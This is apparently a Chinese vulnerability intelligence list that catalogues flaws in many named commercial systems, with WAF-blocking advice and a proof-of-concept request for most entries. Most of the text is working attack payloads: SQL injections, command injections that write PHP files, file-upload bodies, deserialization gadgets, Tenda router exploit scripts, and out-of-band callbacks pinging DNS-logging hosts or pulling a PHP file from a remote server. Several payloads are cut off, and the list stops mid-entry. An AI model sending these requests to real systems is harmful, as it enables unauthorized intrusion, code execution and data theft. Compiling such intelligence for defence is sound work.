/api/get_kq_tj_today |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
科讯一卡通管理系统DataService.asmx存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/DataService.asmx |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
POST /DataService.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExeAppCmd xmlns="http://tempuri.org/">
<str>{"cmd":"get_sb_guanli","Type":"1');WAITFOR DELAY '0:0:4'--"}</str>
<files>MTIz</files>
</ExeAppCmd>
</soap:Body>
</soap:Envelope>
资管云
资管云-任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/comfileup.php |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /comfileup.php HTTP/1.1
Host:
----------1110146050
test
----------1110146050--
孚盟云
孚盟云-CRM系统-SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/Ajax/AjaxMethod.ashx?action=getEmpByname&Name= |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=1%27 HTTP/1.1
迈普
迈普-多业务融合网关-信息泄露
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/.htpasswd/ |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/.htpasswd/
至码云
微信公众平台-无限回调系统 -SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/user/ajax.php?act=siteadd |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /user/ajax.php?act=siteadd HTTP/1.1
siteUrl=';select sleep(5)#'
绿盟
绿盟 SAS堡垒机 Exec 远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/webconf/Exec/index?cmd= |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /webconf/Exec/index?cmd=id HTTP/1.1
深信服
深信服-下一代防火墙-RCE
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
<=AF8.0.17 |
/cgi-bin/login.cgi |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /cgi-bin/login.cgi HTTP/1.1
{\"opr\":\"login\", \"data\":{\"user\": \"watchTowr\" , \"pwd\": \"watchTowr\" , \"vericode\": \"EINW\" , \"privacy_enable\": \"0\"}}
深信服 SSL VPN 短信验证码暴力猜解漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
M7.1~M7.6.9R4 |
未知 |
针对受影响版本可下载升级SP SSL AW 02补丁包即可完成修复。如果没开启找回密码功能,则不受该问题影响。可以通过在短信验证码设置中,关闭【找回密码】功能,规避该问题。 |
0813 |
1day |
漏洞详情
深信服VPN问题,影响版本为M7.1~M7.6.9R4,在设备开启找回密码功能且已获知用户账号的前提下可能存在暴力破解验证码,从而修改用户密码的问题。
微信
wechat 3.9.11.25 self rce
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
3.9.11.25 |
未知 |
等着 |
726 |
nday |
漏洞详情
未知
深澜
深澜计费管理系统strategy存在反序列化漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/strategy/ip/bind-ip |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /strategy/ip/bind-ip HTTP/1.1
data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B
RAISECOM
RAISECOM网关设备list_base_config.php存在远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/vpn/list_base_config.php |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo.php%60 HTTP/1.1
RAISECOM网关设备list_base_config.php存在远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/vpn/list_base_config.php |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo.php%60 HTTP/1.1
竹云
竹云 信息泄露
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/admin-api/oauth/../admin/user/findlist |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /admin-api/oauth/../admin/user/findlist HTTP/1.1
{"pagesize":改个数,"pageNumber":改个数,"userName":""}
金万维
金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/GNRemote.dll |
WAF封禁路路径,等待发布补丁 |
729 |
1day |
漏洞详情
GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1
宏脉
宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件下载 |
未知 |
/zh-CN/PublicInterface/DownLoadServerFile |
WAF封禁路路径,等待发布补丁 |
729 |
0day |
漏洞详情
POST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1
filePath=c:\windows\win.ini
瑞斯康达
瑞斯康达-多业务智能网关-RCE
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/vpn/list_base_config.php |
WAF封禁路路径,等待发布补丁 |
729 |
0day |
漏洞详情
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
瑞斯康达多业务智能网关 list_service_manage.php 存在远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
MSG2100E系列融合型多业务智能网关 |
/vpn/list_service_manage.php |
WAF封禁路路径,等待发布补丁 |
0823 |
0day |
漏洞详情
POST /vpn/list_service_manage.php?template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo29.php%60 HTTP/1.1
Nradius_submit=true
超级猫
超级猫签名APP分发平台前台存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/user/install/downfile_ios |
WAF封禁路路径,等待发布补丁 |
729 |
0day |
漏洞详情
GET /user/install/downfile_ios?id=') UNION ALL SELECT NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - HTTP/1.1
超级猫签名APP分发平台前台远程文件写入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/user/profile/download |
WAF封禁路路径,等待发布补丁 |
729 |
1day |
漏洞详情
/user/profile/download?url=http://云服务器地址/111.php&path=1
通达
通达OAV11.10接口login.php存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
11.1 |
/ispirit/interface/login.php |
WAF封禁路路径,等待发布补丁 |
729 |
1day |
漏洞详情
POST /ispirit/interface/login.php HTTP/1.1
Host:
name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1% 3d0,1,(select+~0%2b1))+limit+0,1))--+'
邦永
邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/FlowChartDefine/ExcelIn.aspx |
WAF封禁路路径,等待发布补丁 |
729 |
1day |
漏洞详情
POST /FlowChartDefine/ExcelIn.aspx HTTP/1.1
------WebKitFormBoundaryAU4uQKbpWhA7eME3
U6iRl9SqWWlhjIPJXIeFrsinqYAmYxenxFiyfWFMfWgnw3OtkceDLcdfRvB8pmUNGk44PvjZ6LlzPwDbJGmilsmhuX9LvOiuKadYa9iDdSipLW5JvUHjS89aGzKqr9fhih+p+/Mm+q2vrknhfEJJnQ==
------WebKitFormBoundaryAU4uQKbpWhA7eME3
FD259C0F
------WebKitFormBoundaryAU4uQKbpWhA7eME3
/pKblUYGQ+ibKtw4CCS2wzX+lmZIOB+x5ezYw0qJFbaUifUKlxNNRMKceZYgY/eAUUTaxe0gSvyv/oA8lUS7G7jPVqqrMEzYBVBl8dRkFWFwMqqjv1G9gXM/ZnIpnVSL
------WebKitFormBoundaryAU4uQKbpWhA7eME3
{{unquote("PK\x03\x04\x14\x00\x01\x00\x00\x00\xefl\xfaX\x1c:\xf5\xcb\x11\x00\x00\x00\x05\x00\x00\x00\x08\x00\x00\x001234.txt\xb0\x0c\x01\x08\xd1!\xd1Uv \xfal\x9b\xf4Q\xfd\xf8PK\x01\x02?\x00\x14\x00\x01\x00\x00\x00\xefl\xfaX\x1c:\xf5\xcb\x11\x00\x00\x00\x05\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x001234.txt\x0a\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x05\x8d\x9d.\x1e\xdf\xda\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00Z\x00\x00\x007\x00\x00\x00\x00\x00")}}
------WebKitFormBoundaryAU4uQKbpWhA7eME3
模块导入
------WebKitFormBoundaryAU4uQKbpWhA7eME3--
群杰
群杰印章物联网管理平台rest密码重置
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/api/token/updateRestUser?restname=rest&password= |
WAF封禁路路径,等待发布补丁 |
729 |
nday |
漏洞详情
/api/token/updateRestUser?restname=rest&password={{password}}
群杰印章物联网管理平台RCE 0day
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
未知 |
WAF封禁路路径,等待发布补丁 |
729 |
0day |
漏洞详情
未知
瑞格
瑞格心里教育信息化管理系统SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/NPreenManage/NPreenSMSList.asmx |
WAF封禁路路径,等待发布补丁 |
729 |
0day |
漏洞详情
未知
梓川
苏州梓川信息PEPM系统反序列化漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
<V6.7.3.20240507.Release |
/ |
WAF封禁路路径,等待发布补丁 |
730 |
0day |
漏洞详情
POST / HTTP/1.1
Host:
方天
方天云智慧平台系统 GetCompanyItem SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/AjaxMethods.asmx/GetCompanyItem |
WAF封禁路路径,等待发布补丁 |
730 |
0day |
漏洞详情
POST /AjaxMethods.asmx/GetCompanyItem HTTP/1.1
{cusNumber:"1' and 1=@@version--+"}
方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/WXAPI.asmx/GetCustomerLinkman |
WAF封禁路路径,等待发布补丁 |
801 |
nday |
漏洞详情
POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1
{clmID:"1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QurA"}
方天云智慧平台系统 Upload.ashx 任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/Upload.ashx |
WAF封禁路路径,等待发布补丁 |
801 |
nday |
漏洞详情
POST /Upload.ashx HTTP/1.1
------WebKitFormBoundarySl8siBbmVicABvTX
<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>
------WebKitFormBoundarySl8siBbmVicABvTX--
----------------------------------------------------------------------------------------------------------------------
/UploadFile/CustomerFile/回显的路径
任我行
任我行协同CRM反序列化漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/SystemManage/UploadFile |
WAF封禁路路径,等待发布补丁 |
730 |
0day |
漏洞详情
POST /SystemManage/UploadFile HTTP/1.1
photoInfo={{base64dec(ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIHBpbmcgYWU1d3BiLmRuc2xvZy5jbiddDQogICAgfSwNCiAgICAnT2JqZWN0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSd9DQp9)}}
热网
热网无线监测系统frmSaveChartImage存在 任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
未知 |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
未知
派网
北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/Maintain/sprog_upstatus.php |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
KubePi
KubePi存在JWT token验证绕过漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/kubepi/api/v1/users |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
POST /kubepi/api/v1/users HTTP/1.1
{"apiVersion":"v1","kind":"User","name":"test1","roles":["Common User","Manage Image Registries","Manage Clusters","Manage RBAC"],"nickName":"tang","email":"test1@qq.com","authenticate":{"password":"12345678@Test"},"mfa":{"enable":false,"secret":""}}
Quicklancer
Quicklancer存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/listing |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1&salary-type=1&sort=id&subcat= HTTP/1.1
python3 sqlmap.py -r test.txt -p range2 --dbms=mysql --current-db --current-user --batch
Quicklancer存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/listing |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1&salary-type=1&sort=id&subcat= HTTP/1.1
python3 sqlmap.py -r test.txt -p range2 --dbms=mysql --current-db --current-user --batch
因酷
因酷教育平台RCE(CVE-2024-35570)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/image/gok4 |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
POST /image/gok4?¶m=image&fileType=jpg,gif,png,jpeg,jspx&pressText=undefined HTTP/1.1
-----------------------------308436435515370414691526924874
123
-----------------------------308436435515370414691526924874--
腾达
Tenda FH1201 v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
v1.2.0.14 |
/goform/WriteFacMac |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
import requests
ip = '192.168.74.145'
url = "http://" + ip + "/goform/WriteFacMac"
payload = ";echo 'hacker!'"
data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)
Tenda FH1201 v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
v1.2.0.14 |
/goform/exeCommand |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
import requests
ip = '192.168.74.145'
url = f"http://{ip}/goform/exeCommand"
data = "cmdinput=ls;"
ret = requests.post(url=url,data=data)
甄云
甄云 SRM 云平台 SpEL 表达式注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/oauth/public/SpEL表达式/ab?username=bHM= |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
/oauth/public/SpEL表达式/ab?username=bHM=
甄云-SRM云平台 -JNDI注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/oauth/public/SpEL表达式/ab?username=bHM= |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
/oauth/public/SpEL表达式/ab?username=bHM=
甄云-SRM云平台存在RCE
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/ |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
/?aa=__${T(groovy.lang.GroovyClassLoader).newInstance().defineClass('CALC',T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('yv'+'66vgAAADQAgwoAHABGCgBHAEgHAEkKAAMASgoAAwBLCwBMAE0LAE4ATwoAUABRCgBSAFMHAFQKAAoARgcAVQoADABWCgAKAFcKABwAWAoAFABZBwBaBwBbCgASAEYHAFwKABQAXQoAEQBeCgASAFgIAF8KABQAYAoAFABhBwBiBwBjAQAGPGluaXQ%2bAQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWIBAAJbQgEABXNoZWxsAQAZTGdyb292eS9sYW5nL0dyb292eVNoZWxsOwEAAW8BABJMamF2YS9sYW5nL09iamVjdDsBAA
未知
证书查询系统存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/index/ajax/lang?lang= |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
IP网络广播服务平台upload存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/api/v2/remote-upgrade/upload |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
POST /api/v2/remote-upgrade/upload HTTP/1.1
Host:
------WebKitFormBoundarytiZYyyKkbwCxtHC1
<?php phpinfo();?>
------WebKitFormBoundarytiZYyyKkbwCxtHC1--
喰星云
喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/logistics/home_warning/php/not_out_depot.php |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
GET /logistics/home_warning/php/not_out_depot.php?do=getList&lsid= HTTP/1.1
喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/logistics/home_warning/php/not_finish.php |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
GET /logistics/home_warning/php/not_finish.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/logistics/home_warning/php/shelflife.php |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
GET /logistics/home_warning/php/shelflife.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
Host:
喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/logistics/home_warning/php/stock.php |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
GET /logistics/home_warning/php/stock.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
Host:
panabit
panabit日志审计系统sprog_upstatus存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/Maintain/sprog_upstatus.php |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
铭飞
铭飞MCMS 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/static/plugins/ueditor/1.4.3.3/jsp/editor.do |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
POST /static/plugins/ueditor/1.4.3.3/jsp/editor.do?jsonConfig=%7b%76%69%64%65%6f%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%66%69%6c%65%4d%61%6e%61%67%65%72%4c%69%73%74%50%61%74%68%3a%27%27%2c%69%6d%61%67%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%76%69%64%65%6f%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%7b%5c%75%30%30%32%45%5c%75%30%30%32%45%5c%75%30%30%32%46%7d%7b%74%65%6d%70%6c%61%74%65%2f%31%2f%64%65%66%61%75%6c%74%2f%7d%7b%74%69%6d%65%7d%27%2c%66%69%6c%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%76%69%64%65%6f%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%22%69%6d%61%67%65%41%6c%6c%6f%77%46%69%6c%65%73%22%3a%5b%22%2e%70%6e%67%22%2c%20%22%2e%6a%70%67%22%2c%20%22%2e%6a%70%65%67%22%2c%20%22%2e%6a%73%70%78%22%2c%20%22%2e%6a%73%70%22%2c%22%2e%68%74%6d%22%5d%7d%0a&action=uploadimage HTTP/1.1
boundary=--------------------------583450229485407027180070
----------------------------583450229485407027180070
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("ping xudzooqzos.dgrh3.cn") }
----------------------------583450229485407027180070--
SpringBlade
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/api/blade-system/menu/list |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1
管理易
eking管理易FileUpload接口存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/app/FileUpload.ihtm |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
POST /app/FileUpload.ihtm?comm_type=EKING&file_name=../../rce.jsp. HTTP/1.1
--WebKitFormBoundaryHHaZAYecVOf5sfa6
<% out.println("hello");%>
--WebKitFormBoundaryHHaZAYecVOf5sfa6--
雄威
杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/Account/ForgetUser |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
重置密码处,改回包中的code字段为1
LiveBOS
LiveBOS接口UploadFile.do存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/feed/UploadFile.do |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /feed/UploadFile.do;.js.jsp HTTP/1.1
---WebKitFormBoundaryxegqoxxi
<%@ page import="java.io.File" %>
<%
out.println("asdasd");
String filePath = application.getRealPath(request.getServletPath());
new File(filePath).delete();
%>
---WebKitFormBoundaryxegqoxxi--
灵动业务架构平台(LiveBOS)UploadFile.do 接口文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/feed/UploadFile.do |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /feed/UploadFile.do;.css.jsp HTTP/1.1
Host:
boundary=--------------------------688644671867822357584225
----------------------------688644671867822357584225
test ----------------------------688644671867822357584225—-
LiveBOS UploadImage.do 接口任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/feed/UploadImage.do |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /feed/UploadImage.do;.js.jsp HTTP/1.1
Host:
boundary=----WebKitFormBoundaryxegqoxxi
---WebKitFormBoundaryxegqoxxi
filename="../../../../../../././../../../../../java/fh/tomcat_fhxszsq/LiveBos/FormBuilder/
